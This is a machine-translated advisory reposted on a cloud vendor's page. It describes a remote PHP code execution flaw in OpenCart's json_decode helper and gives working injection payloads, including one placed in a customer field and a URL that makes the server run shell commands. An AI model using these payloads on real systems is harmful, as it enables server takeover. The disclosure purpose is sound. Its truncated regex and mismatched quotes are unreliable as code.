A remote PHP code execution vulnerability exists in the OpenCart json_decode function

Source: Internet
Author: User
Tags php json opencart
2016-04-12 14:12:56 Source: 360 Security Broadcast author: Dark Feather Meow read: 103 plays

Share to:

Recently, security researcher Naser Farhadi (Twitter: @naserfarhadi) found that there was a remote PHP code execution vulnerability in OpenCart json_decode function, involving a version of 2.1.0.2 to 2.2.0.0 (latest version)

The vulnerability exists in/upload/system/helper/json.php, where the code

#/upload/system/helper/json.php$match = '/'. *? (?
     

Where the function is created through JSON, and the Json_decode function can be exploited

Here are a few simple test examples

Var_dump (Json_decode (' {"OK": "1". " 2 "." 3 "} '));

Var_dump (Json_decode (' {"OK": "$_server[http_user_agent]"} '));

Var_dump (Json_decode (' {"OK": "{$_get[b] ($_get[c])}"} ");

In real-world scenarios, it can be exploited through/index.php?route=account/edit

For example, $_server[http_user_agent] as the name of the fill in, save (need to repeat two times)

Then when the administrator accesses the admin panel, he will see his own useragent in the place where he should have displayed your name in the recent activity

Another example is the Custom_field in Account/edit or Account/register, where the use may be the most appropriate

If the administrator adds a custom zone to the/admin/index.php?route=customer/custom_field for additional information such as phone numbers

You can inject your code directly into this Custom_field.

For example, {$_get[b] ($_get[c])} is filled in this Custom_field, save

Then visit

Http://host/shop_directory/index.php?route=account/edit&b=system&c=ls

You'll see that the code is executed correctly.

It is important to note that this usage will only work if the PHP JSON extension is not installed

This article by 360 security broadcast translation, reprint please specify "Transfer from 360 security broadcast", and attached link.

Original link: http://seclists.org/bugtraq/2016/Apr/61
  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.